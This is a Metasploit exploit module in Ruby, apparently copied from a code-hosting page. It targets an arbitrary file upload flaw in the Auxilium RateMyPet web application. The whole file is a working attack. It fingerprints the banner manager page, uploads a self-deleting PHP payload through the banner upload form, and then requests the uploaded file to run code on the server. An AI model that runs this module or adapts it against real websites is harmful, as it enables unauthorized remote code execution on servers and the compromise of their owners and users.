Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::PhpEXE
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
15
      'Description'    => %q{
16
          This module exploits a vulnerability found in Auxilium RateMyPet's. The site
17
        banner uploading feature can be abused to upload an arbitrary file to the web
18
        server, which is accessible in the 'banner' directory, thus allowing remote code
19
        execution.
20
      },
21
      'License'        => MSF_LICENSE,
22
      'Author'         =>
23
        [
24
          'DaOne',  # Vulnerability discovery
25
          'sinn3r'  # Metasploit
26
        ],
27
      'References'     =>
28
        [
29
          ['OSVDB', '85554'],
30
          ['EDB', '21329']
31
        ],
32
      'Payload'        =>
33
        {
34
          'BadChars' => "\x00"
35
        },
36
      'Platform'       => %w{ linux php },
37
      'Targets'        =>
38
        [
39
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
40
          [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
41
        ],
42
      'Privileged'     => false,
43
      'DisclosureDate' => '2012-09-14',
44
      'DefaultTarget'  => 0))
45

46
    register_options(
47
      [
48
        OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
49
      ])
50
  end
51

52

53
  def check
54
    uri = target_uri.path
55
    base = File.dirname("#{uri}.")
56

57
    res = send_request_raw({
58
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
59
    })
60
    if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
61
      return Exploit::CheckCode::Detected
62
    else
63
      return Exploit::CheckCode::Safe
64
    end
65
  end
66

67

68

69
  def upload_exec(base, php_fname, p)
70
    data = Rex::MIME::Message.new
71
    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
72
    data.add_part('', nil, nil, "form-data; name=\"alt\"")
73
    data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
74
    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")
75

76
    post_data = data.to_s
77

78
    print_status("Uploading payload (#{p.length.to_s} bytes)...")
79
    res = send_request_cgi({
80
      'method' => 'POST',
81
      'uri'    => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
82
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
83
      'data'   => post_data,
84
    })
85

86
    if not res
87
      print_error("No response from host")
88
      return
89
    end
90

91
    print_status("Requesting '#{php_fname}'...")
92
    res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
93
    if res and res.code == 404
94
      print_error("Upload unsuccessful: #{res.code.to_s}")
95
      return
96
    end
97

98
    handler
99
  end
100

101

102
  def exploit
103
    uri = normalize_uri(target_uri.path)
104
    uri << '/' if uri[-1,1] != '/'
105
    base = File.dirname("#{uri}.")
106

107
    php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"
108

109
    p = get_write_exec_payload(:unlink_self=>true)
110

111
    upload_exec(base, php_fname, p)
112
  end
113
end
114

115